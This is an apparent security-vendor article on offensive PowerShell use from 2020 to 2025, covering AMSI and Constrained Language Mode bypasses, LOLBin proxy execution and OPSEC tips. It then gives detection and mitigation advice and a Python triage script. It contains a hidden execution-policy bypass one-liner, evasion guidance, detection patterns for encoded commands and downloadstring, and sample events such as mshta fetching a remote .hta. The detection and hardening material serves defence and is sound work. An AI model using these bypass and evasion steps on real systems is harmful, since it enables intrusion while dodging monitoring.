Offensive PowerShell Techniques (2020–2025) – Evasion, LOLBins, and Countermeasures

Executive Summary

PowerShell remains one of the most exploited native Windows tools in both red team and threat actor operations. From 2020–2025, its integration into the OS, deep administrative capabilities, and ability to operate “fileless” have driven widespread abuse. Key evolutions include advanced AMSI bypasses, Constrained Language Mode (CLM) evasions, and LOLBins-based proxy execution.
Notably, 35% of malicious detections in 2022 leveraged LOLBins, and PowerShell consistently ranked #2 in MITRE ATT&CK detections across enterprise telemetry. For red teams, it’s a high-reward vector; for blue teams, it’s a high-priority detection surface.

Overview

  • Primary Function: Post-exploitation control, payload delivery, persistence, and data exfiltration.
  • Core Strength: Native to Windows, signed by Microsoft, and deeply integrated with .NET.
  • Platforms: Windows (desktop & server), with PowerShell Core also supporting Linux/macOS.
  • Attack Surfaces:
    • Command-line execution
    • In-memory payload delivery
    • LOLBins proxy execution
    • Remote administration abuse

Setup & Deployment

Red Team Operator Loadout:

  1. Environment Prep:
    • Ensure PowerShell v5+ for modern capabilities (unless intentionally downgrading for AMSI evasion).
    • Install modules: PowerSploit, Nishang, PSEmpire (if opsec allows).
  2. Execution Policy Bypass:
    powershell.exe -nop -w hidden -ep bypass
    
  3. Deploy Stealth:
    • Use System.Management.Automation namespace directly from .NET to avoid powershell.exe invocation.
    • Host payloads in memory with reflective loaders.
  4. LOLBins Integration: Chain with rundll32, mshta, or installutil to execute PowerShell without the binary present in process listings.

Native Windows tools are the preferred weapon of both red teams and threat actors precisely because they blend in. If your detection strategy doesn’t account for living-off-the-land techniques, you have a visibility gap.

Operational Use Cases

Red Team Applications:

  • AMSI Bypass – Memory patching, reflection abuse, AMSI Write Raid (disclosed by OffSec in May 2024).
  • CLM Bypass – System32 path spoofing, PowerShell downgrade to v2.
  • Script Obfuscation – ASCII value conversion, compression + Base64, AST manipulation.
  • LOLBins Proxying – certutil for file retrieval, mshta for script execution, rundll32 for stealth code execution.
  • In-Memory Execution – VirtualAlloc + shellcode loaders, reflective DLL injection.

Blue Team Simulation:

  • Weaponized to test detection coverage for:
    • AMSI bypass recognition
    • ScriptBlock smuggling
    • LOLBins chaining
    • Behavioral anomaly detection

OPSEC Considerations

  • Process Visibility: Direct powershell.exe usage spikes alerts in mature SOC environments.
  • Telemetry Footprint: Even with AMSI bypassed, Script Block Logging may expose payload content unless explicitly disabled.
  • Parent-Child Process Chains: LOLBins execution reduces but doesn’t eliminate forensic traceability.
  • Sandbox/EDR Behavior: New AI-based EDRs detect behavioral anomalies even without signature triggers.
  • Payload Hosting: External staging over HTTP(S) risks threat intel flagging—use redirectors or internal C2 pivoting.

Defensive Countermeasures

Detection Priorities:

  • Enable and forward Script Block Logging (Event ID 4104) and Module Logging (4103).
  • Hunt for:
    • -EncodedCommand, -nop, -noni, .downloadstring
    • Excessive special character usage in command lines
    • Unexpected parent processes spawning PowerShell
  • Monitor LOLBin usage patterns (mshta, rundll32, certutil, installutil) for abnormal arguments.
  • Detect AMSI tampering via:
    • VirtualProtect API call monitoring
    • Registry changes to AMSI providers
    • Reflection usage against AMSI components
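The hunt list above, turned into triage logic over process-creation records. This is an added example, not code from the original post: the sample events, the unexpected-parent list and the special-character threshold are constructed assumptions to tune against your own baseline.

```python
"""Hunt-indicator triage over constructed process-creation records (added example,
not part of the original post; sample events and thresholds are assumed)."""
import re

# Abbreviations powershell.exe accepts for the flags hunted above, matched case-insensitively.
FLAG_PATTERNS = {
    "encoded_command": r"(?<!\S)-(e|ec|enc|encodedcommand)(?!\w)",
    "no_profile": r"(?<!\S)-nop(rofile)?(?!\w)",
    "non_interactive": r"(?<!\S)-noni(nteractive)?(?!\w)",
    "downloadstring": r"\.downloadstring\b",
}
LOLBINS = {"mshta.exe", "rundll32.exe", "certutil.exe", "installutil.exe"}
UNEXPECTED_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "mshta.exe"}
SPECIAL_CHAR_THRESHOLD = 0.25  # assumed tuning value; baseline it against your own fleet


def special_char_ratio(cmd):
    """Share of non-alphanumeric characters once whitespace is removed."""
    body = "".join(cmd.split())
    return sum(not c.isalnum() for c in body) / len(body) if body else 0.0


def triage(event):
    """Return the hunt indicators an event trips; an empty list means nothing matched."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["command_line"]
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        hits += [name for name, pat in FLAG_PATTERNS.items() if re.search(pat, cmd, re.I)]
        if special_char_ratio(cmd) > SPECIAL_CHAR_THRESHOLD:
            hits.append("excessive_special_chars")
        if parent in UNEXPECTED_PARENTS:
            hits.append("unexpected_parent:" + parent)
    # A LOLBin launched with a URL or script-file argument deserves a second look.
    if image in LOLBINS and re.search(r"https?://|\.(hta|ps1|vbs|js)\b", cmd, re.I):
        hits.append("lolbin_abnormal_args:" + image)
    return hits


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"parent": "winword.exe", "image": "powershell.exe",  # -enc payload is UTF-16LE "Get-Date"
     "command_line": "powershell.exe -nop -w hidden -noni -enc RwBlAHQALQBEAGEAdABlAA=="},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -Command Get-Service -Name Spooler"},
    {"parent": "cmd.exe", "image": "mshta.exe",
     "command_line": "mshta.exe http://example.invalid/stage.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -c \"$a='G'+'e'+'t';$b='-Da'+'te';&($a+$b)\""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["command_line"][:60], "->", triage(ev) or "clean")
```

Feed it the CommandLine and ParentImage fields from Sysmon Event ID 1 or Security 4688 records and forward anything with two or more hits for analyst review.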

Mitigation Controls:

  • Enforce AllSigned or RemoteSigned execution policy.
  • Apply AppLocker or WDAC to limit PowerShell to trusted scripts.
  • Use Just Enough Administration (JEA) for role-limited PowerShell capability.
  • Deploy Constrained Language Mode for non-admin accounts.

Noorstream Perspective

PowerShell is a must-have vector in the offensive playbook. In the Noorstream stack:

  • Red Team: Used for chained payload execution, behavioral evasion, and live lateral movement tests.
  • Threat Intel: Monitored as a high-signal telemetry source for active breach indicators.
  • Defensive Advisory: Hardening client environments against PowerShell abuse is a baseline service—LOLBins and AMSI bypass detection are part of our default Blue Team assessment package.
  • Training: Noorstream’s red team operators maintain proficiency in emerging bypasses while our blue team replicates and tunes defenses against them.
